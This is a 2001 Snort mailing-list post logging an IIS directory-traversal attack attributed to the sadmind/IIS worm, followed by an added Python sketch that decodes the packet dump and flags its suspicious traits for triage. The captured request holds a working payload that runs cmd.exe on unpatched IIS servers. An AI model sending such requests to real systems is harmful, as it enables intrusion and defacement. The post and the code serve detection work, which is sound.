Snort mailing list archives
Intrusion Detection Event
From: Claude Bailey <Claude.Bailey () RIAG com>
Date: Wed, 9 May 2001 15:01:33 -0500
The sample Internet data packet below was one of 28 we received from China on 5/8/01 to our web-servers. The packet request includes a signature of the sadmind/IIS worm and tries to load a DOS command box. This attack is being used to deface web-servers.

[**] WEB-MISC http directory traversal [**]
05/08-00:44:17.902561 202.107.205.193:34044 -> a.b.c.d:80
TCP TTL:236 TOS:0x0 ID:26709 IpLen:20 DgmLen:106 DF
***AP*** Seq: 0x75F5569F Ack: 0x4307F098 Win: 0x2238 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 31 25 31 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c1%1c../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
0D 0A                                            ..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
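Added example, not part of the original post: a Python sketch that rebuilds the HTTP request from the payload dump in the alert above and reports the traits a defender would key on when triaging similar alerts. It goes slightly beyond this one packet by flagging any percent-escaped 0xC0 or 0xC1 byte, since neither ever occurs in well-formed UTF-8; the function names and finding labels are assumptions chosen for illustration.

```python
import re

# Payload lines copied from the Snort alert above (hex column, then ASCII column).
ALERT_DUMP = """\
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 31 25 31 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c1%1c../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
0D 0A                                            ..
"""

# Up to 16 single-space-separated hex pairs at the start of a dump line.
HEX_RUN = re.compile(r"^((?:[0-9A-Fa-f]{2} ){0,15}[0-9A-Fa-f]{2})(?=\s|$)")
ESCAPE = re.compile(r"%([0-9A-Fa-f]{2})")


def payload_bytes(dump):
    """Rebuild the raw TCP payload from the hex column, ignoring the ASCII column."""
    out = bytearray()
    for line in dump.splitlines():
        match = HEX_RUN.match(line.strip())
        if match:
            out += bytes.fromhex(match.group(1))
    return bytes(out)


def request_target(payload):
    """Return the request target (second token of the HTTP request line)."""
    request_line = payload.split(b"\r\n", 1)[0].decode("latin-1")
    parts = request_line.split(" ")
    return parts[1] if len(parts) >= 2 else ""


def findings(target):
    """Percent-decode the path once and list the suspicious traits it shows."""
    path = target.split("?", 1)[0]
    raw = ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), path)
    hits = []
    if "\xc0" in raw or "\xc1" in raw:  # bytes that valid UTF-8 never contains
        hits.append("invalid-utf8-lead-byte")
    if ".." in raw:
        hits.append("dot-dot-segment")
    if "cmd.exe" in raw.lower():
        hits.append("command-interpreter")
    return hits


if __name__ == "__main__":
    target = request_target(payload_bytes(ALERT_DUMP))
    print(target, findings(target))
```

The rebuilt payload is 66 bytes, which matches the alert header: DgmLen 106 minus IpLen 20 and TcpLen 20.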